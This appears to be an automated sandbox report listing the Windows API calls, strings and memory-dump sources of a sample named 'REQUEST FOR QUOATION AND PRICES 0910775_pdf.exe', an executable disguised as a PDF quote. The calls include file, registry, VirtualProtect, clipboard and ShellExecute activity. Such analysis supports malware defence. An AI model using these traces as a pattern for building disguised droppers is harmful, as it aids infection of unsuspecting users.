                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2534828695.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AllocErrorLastVirtual
                                                                                                                                  APIs
                                                                                                                                  • SetFilePointer.KERNELBASE(00000000,?,00000000,00000002,?,?), ref: 004027A0
                                                                                                                                    • Part of subcall function 00405F9C: wsprintfW.USER32 ref: 00405FA9
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2521375985.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FilePointerwsprintf
                                                                                                                                  APIs
                                                                                                                                  • WritePrivateProfileStringW.KERNEL32(00000000,00000000,?,00000000), ref: 004022D4
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2521375985.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Similarity
                                                                                                                                  • API ID: PrivateProfileStringWrite
                                                                                                                                  APIs
                                                                                                                                  • RegOpenKeyExW.KERNELBASE(00000000,00000460,00000000,00000022,00000000,?,?), ref: 00402CF1
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2521375985.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Open
                                                                                                                                  APIs
                                                                                                                                  • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,0040320B,00000000,00416A20,000000FF,00416A20,000000FF,000000FF,00000004,00000000), ref: 00405CF0
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2521375985.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FileWrite
                                                                                                                                  APIs
                                                                                                                                  • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,00403255,00000000,00000000,00403079,000000FF,00000004,00000000,00000000,00000000), ref: 00405CC1
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2521375985.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FileRead
                                                                                                                                  APIs
                                                                                                                                  • VirtualProtect.KERNELBASE(1000405C,00000004,00000040,1000404C), ref: 100027E5
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2534828695.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ProtectVirtual
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 544645111-0
                                                                                                                                  APIs
                                                                                                                                  • SetFileAttributesW.KERNELBASE(00000000,?,000000F0), ref: 004015A6
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2521375985.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AttributesFile
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3188754299-0
                                                                                                                                  APIs
                                                                                                                                  • SendMessageW.USER32(00000028,?,00000001,00403F7A), ref: 0040415C
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2521375985.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessageSend
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3850602802-0
                                                                                                                                  APIs
                                                                                                                                  • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402FB5,?,?,?,00000000,0040353A,?), ref: 00403266
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2521375985.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FilePointer
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 973152223-0
                                                                                                                                  APIs
                                                                                                                                  • GetDlgItem.USER32(?,00000403), ref: 00405351
                                                                                                                                  • GetDlgItem.USER32(?,000003EE), ref: 00405360
                                                                                                                                  • GetClientRect.USER32(?,?), ref: 0040539D
                                                                                                                                  • GetSystemMetrics.USER32(00000002), ref: 004053A4
                                                                                                                                  • SendMessageW.USER32(?,00001061,00000000,?), ref: 004053C5
                                                                                                                                  • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004053D6
                                                                                                                                  • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004053E9
                                                                                                                                  • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004053F7
                                                                                                                                  • SendMessageW.USER32(?,00001024,00000000,?), ref: 0040540A
                                                                                                                                  • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040542C
                                                                                                                                  • ShowWindow.USER32(?,00000008), ref: 00405440
                                                                                                                                  • GetDlgItem.USER32(?,000003EC), ref: 00405461
                                                                                                                                  • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405471
                                                                                                                                  • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 0040548A
                                                                                                                                  • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405496
                                                                                                                                  • GetDlgItem.USER32(?,000003F8), ref: 0040536F
                                                                                                                                    • Part of subcall function 0040414E: SendMessageW.USER32(00000028,?,00000001,00403F7A), ref: 0040415C
                                                                                                                                  • GetDlgItem.USER32(?,000003EC), ref: 004054B3
                                                                                                                                  • CreateThread.KERNEL32(00000000,00000000,Function_00005287,00000000), ref: 004054C1
                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 004054C8
                                                                                                                                  • ShowWindow.USER32(00000000), ref: 004054EC
                                                                                                                                  • ShowWindow.USER32(?,00000008), ref: 004054F1
                                                                                                                                  • ShowWindow.USER32(00000008), ref: 0040553B
                                                                                                                                  • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040556F
                                                                                                                                  • CreatePopupMenu.USER32 ref: 00405580
                                                                                                                                  • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405594
                                                                                                                                  • GetWindowRect.USER32(?,?), ref: 004055B4
                                                                                                                                  • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004055CD
                                                                                                                                  • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405605
                                                                                                                                  • OpenClipboard.USER32(00000000), ref: 00405615
                                                                                                                                  • EmptyClipboard.USER32 ref: 0040561B
                                                                                                                                  • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405627
                                                                                                                                  • GlobalLock.KERNEL32(00000000), ref: 00405631
                                                                                                                                  • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405645
                                                                                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 00405665
                                                                                                                                  • SetClipboardData.USER32(0000000D,00000000), ref: 00405670
                                                                                                                                  • CloseClipboard.USER32 ref: 00405676
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2521375985.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                                                                  • String ID: {
                                                                                                                                  • API String ID: 590372296-366298937
                                                                                                                                  APIs
                                                                                                                                  • GetDlgItem.USER32(?,000003FB), ref: 00404603
                                                                                                                                  • SetWindowTextW.USER32(00000000,?), ref: 0040462D
                                                                                                                                  • SHBrowseForFolderW.SHELL32(?), ref: 004046DE
                                                                                                                                  • CoTaskMemFree.OLE32(00000000), ref: 004046E9
                                                                                                                                  • lstrcmpiW.KERNEL32(Call,0042D268,00000000,?,?), ref: 0040471B
                                                                                                                                  • lstrcatW.KERNEL32(?,Call), ref: 00404727
                                                                                                                                  • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404739
                                                                                                                                    • Part of subcall function 0040577E: GetDlgItemTextW.USER32(?,?,00000400,00404770), ref: 00405791
                                                                                                                                    • Part of subcall function 004062E9: CharNextW.USER32(0040A300,*?|<>/":,00000000,"C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe",75923420,C:\Users\user\AppData\Local\Temp\,00000000,0040327B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034CC), ref: 0040634C
                                                                                                                                    • Part of subcall function 004062E9: CharNextW.USER32(0040A300,0040A300,0040A300,00000000), ref: 0040635B
                                                                                                                                    • Part of subcall function 004062E9: CharNextW.USER32(0040A300,"C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe",75923420,C:\Users\user\AppData\Local\Temp\,00000000,0040327B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034CC), ref: 00406360
                                                                                                                                    • Part of subcall function 004062E9: CharPrevW.USER32(0040A300,0040A300,75923420,C:\Users\user\AppData\Local\Temp\,00000000,0040327B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034CC), ref: 00406373
                                                                                                                                  • GetDiskFreeSpaceW.KERNEL32(0042B238,?,?,0000040F,?,0042B238,0042B238,?,00000001,0042B238,?,?,000003FB,?), ref: 004047FC
                                                                                                                                  • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404817
                                                                                                                                    • Part of subcall function 00404970: lstrlenW.KERNEL32(0042D268,0042D268,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404A11
                                                                                                                                    • Part of subcall function 00404970: wsprintfW.USER32 ref: 00404A1A
                                                                                                                                    • Part of subcall function 00404970: SetDlgItemTextW.USER32(?,0042D268), ref: 00404A2D
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2521375985.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2521361831.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2521393084.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2521406226.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2521406226.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2521406226.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2521406226.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2521406226.000000000045B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2521484999.000000000045D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                  • String ID: A$C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving$Call
                                                                                                                                  APIs
                                                                                                                                  • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404354
                                                                                                                                  • GetDlgItem.USER32(?,000003E8), ref: 00404368
                                                                                                                                  • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404385
                                                                                                                                  • GetSysColor.USER32(?), ref: 00404396
                                                                                                                                  • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004043A4
                                                                                                                                  • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004043B2
                                                                                                                                  • lstrlenW.KERNEL32(?), ref: 004043B7
                                                                                                                                  • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004043C4
                                                                                                                                  • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004043D9
                                                                                                                                  • GetDlgItem.USER32(?,0000040A), ref: 00404432
                                                                                                                                  • SendMessageW.USER32(00000000), ref: 00404439
                                                                                                                                  • GetDlgItem.USER32(?,000003E8), ref: 00404464
                                                                                                                                  • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 004044A7
                                                                                                                                  • LoadCursorW.USER32(00000000,00007F02), ref: 004044B5
                                                                                                                                  • SetCursor.USER32(00000000), ref: 004044B8
                                                                                                                                  • ShellExecuteW.SHELL32(0000070B,open,00432EA0,00000000,00000000,00000001), ref: 004044CD
                                                                                                                                  • LoadCursorW.USER32(00000000,00007F00), ref: 004044D9
                                                                                                                                  • SetCursor.USER32(00000000), ref: 004044DC
                                                                                                                                  • SendMessageW.USER32(00000111,00000001,00000000), ref: 0040450B
                                                                                                                                  • SendMessageW.USER32(00000010,00000000,00000000), ref: 0040451D
                                                                                                                                  Strings
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                                                                                                                  • String ID: -B@$Call$N$open
                                                                                                                                  APIs
                                                                                                                                  • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                                                  • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                                                  • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                                                  • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                                                                  • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                                                                                  • DeleteObject.GDI32(?), ref: 004010ED
                                                                                                                                  • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                                                                                  • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                                                                                  • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                                                                  • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                                                                  • DrawTextW.USER32(00000000,00433F00,000000FF,00000010,00000820), ref: 00401156
                                                                                                                                  • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                                                                  • DeleteObject.GDI32(?), ref: 00401165
                                                                                                                                  • EndPaint.USER32(?,?), ref: 0040116E
                                                                                                                                  Strings
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                                                  • String ID: F
                                                                                                                                  APIs
                                                                                                                                  • lstrcpyW.KERNEL32(00430908,NUL,?,00000000,?,0040A300,00405F17,?,?), ref: 00405D93
                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,0040A300,00405F17,?,?), ref: 00405DB7
                                                                                                                                  • GetShortPathNameW.KERNEL32(?,00430908,00000400), ref: 00405DC0
                                                                                                                                    • Part of subcall function 00405B8F: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405E70,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B9F
                                                                                                                                    • Part of subcall function 00405B8F: lstrlenA.KERNEL32(00000000,?,00000000,00405E70,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405BD1
                                                                                                                                  • GetShortPathNameW.KERNEL32(00431108,00431108,00000400), ref: 00405DDD
                                                                                                                                  • wsprintfA.USER32 ref: 00405DFB
                                                                                                                                  • GetFileSize.KERNEL32(00000000,00000000,00431108,C0000000,00000004,00431108,?,?,?,?,?), ref: 00405E36
                                                                                                                                  • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405E45
                                                                                                                                  • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E7D
                                                                                                                                  • SetFilePointer.KERNEL32(0040A578,00000000,00000000,00000000,00000000,00430508,00000000,-0000000A,0040A578,00000000,[Rename],00000000,00000000,00000000), ref: 00405ED3
                                                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 00405EE4
                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00405EEB
                                                                                                                                    • Part of subcall function 00405C2A: GetFileAttributesW.KERNELBASE(00000003,00402E2E,C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe,80000000,00000003,?,?,00000000,0040353A,?), ref: 00405C2E
                                                                                                                                    • Part of subcall function 00405C2A: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,00000000,0040353A,?), ref: 00405C50
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2521375985.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2521361831.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2521393084.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2521406226.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2521406226.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2521406226.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2521406226.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2521406226.000000000045B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2521484999.000000000045D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizewsprintf
                                                                                                                                  • String ID: %ls=%ls$NUL$[Rename]
                                                                                                                                  • API String ID: 222337774-899692902
                                                                                                                                  APIs
                                                                                                                                  • CharNextW.USER32(0040A300,*?|<>/":,00000000,"C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe",75923420,C:\Users\user\AppData\Local\Temp\,00000000,0040327B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034CC), ref: 0040634C
                                                                                                                                  • CharNextW.USER32(0040A300,0040A300,0040A300,00000000), ref: 0040635B
                                                                                                                                  • CharNextW.USER32(0040A300,"C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe",75923420,C:\Users\user\AppData\Local\Temp\,00000000,0040327B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034CC), ref: 00406360
                                                                                                                                  • CharPrevW.USER32(0040A300,0040A300,75923420,C:\Users\user\AppData\Local\Temp\,00000000,0040327B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034CC), ref: 00406373
                                                                                                                                  Strings
                                                                                                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 004062EA
                                                                                                                                  • *?|<>/":, xrefs: 0040633B
                                                                                                                                  • "C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe", xrefs: 0040632D
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2521375985.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2521361831.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2521393084.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2521406226.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2521406226.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2521406226.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2521406226.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2521406226.000000000045B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2521484999.000000000045D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Char$Next$Prev
                                                                                                                                  • String ID: "C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                                                                                  • API String ID: 589700163-3199143202
                                                                                                                                  APIs
                                                                                                                                  • GetWindowLongW.USER32(?,000000EB), ref: 0040419D
                                                                                                                                  • GetSysColor.USER32(00000000), ref: 004041B9
                                                                                                                                  • SetTextColor.GDI32(?,00000000), ref: 004041C5
                                                                                                                                  • SetBkMode.GDI32(?,?), ref: 004041D1
                                                                                                                                  • GetSysColor.USER32(?), ref: 004041E4
                                                                                                                                  • SetBkColor.GDI32(?,?), ref: 004041F4
                                                                                                                                  • DeleteObject.GDI32(?), ref: 0040420E
                                                                                                                                  • CreateBrushIndirect.GDI32(?), ref: 00404218
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2521375985.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2521361831.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2521393084.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2521406226.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2521406226.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2521406226.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2521406226.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2521406226.000000000045B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2521484999.000000000045D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2320649405-0
                                                                                                                                  APIs
                                                                                                                                  • lstrlenW.KERNEL32(0042C248,00000000,0041D820,759223A0,?,?,?,?,?,?,?,?,?,0040318B,00000000,?), ref: 004051EC
                                                                                                                                  • lstrlenW.KERNEL32(0040318B,0042C248,00000000,0041D820,759223A0,?,?,?,?,?,?,?,?,?,0040318B,00000000), ref: 004051FC
                                                                                                                                  • lstrcatW.KERNEL32(0042C248,0040318B,0040318B,0042C248,00000000,0041D820,759223A0), ref: 0040520F
                                                                                                                                  • SetWindowTextW.USER32(0042C248,0042C248), ref: 00405221
                                                                                                                                  • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405247
                                                                                                                                  • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405261
                                                                                                                                  • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040526F
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2521375985.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2521361831.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2521393084.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2521406226.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2521406226.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2521406226.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2521406226.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2521406226.000000000045B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2521484999.000000000045D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2531174081-0
                                                                                                                                  APIs
                                                                                                                                  • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404A99
                                                                                                                                  • GetMessagePos.USER32 ref: 00404AA1
                                                                                                                                  • ScreenToClient.USER32(?,?), ref: 00404ABB
                                                                                                                                  • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404ACD
                                                                                                                                  • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404AF3
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2521375985.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2521361831.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2521393084.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2521406226.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2521406226.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2521406226.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2521406226.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2521406226.000000000045B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2521484999.000000000045D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Message$Send$ClientScreen
                                                                                                                                  • String ID: f
                                                                                                                                  • API String ID: 41195575-1993550816
                                                                                                                                  APIs
                                                                                                                                  • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402D22
                                                                                                                                  • MulDiv.KERNEL32(0007427C,00000064,00074280), ref: 00402D4D
                                                                                                                                  • wsprintfW.USER32 ref: 00402D5D
                                                                                                                                  • SetWindowTextW.USER32(?,?), ref: 00402D6D
                                                                                                                                  • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402D7F
                                                                                                                                  Strings
                                                                                                                                  • verifying installer: %d%%, xrefs: 00402D57
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2521375985.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2521361831.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2521393084.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2521406226.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2521406226.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2521406226.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2521406226.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2521406226.000000000045B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2521484999.000000000045D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Text$ItemTimerWindowwsprintf
                                                                                                                                  • String ID: verifying installer: %d%%
                                                                                                                                  • API String ID: 1451636040-82062127
                                                                                                                                  APIs
                                                                                                                                  • GetDC.USER32(?), ref: 00401D59
                                                                                                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D66
                                                                                                                                  • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D75
                                                                                                                                  • ReleaseDC.USER32(?,00000000), ref: 00401D86
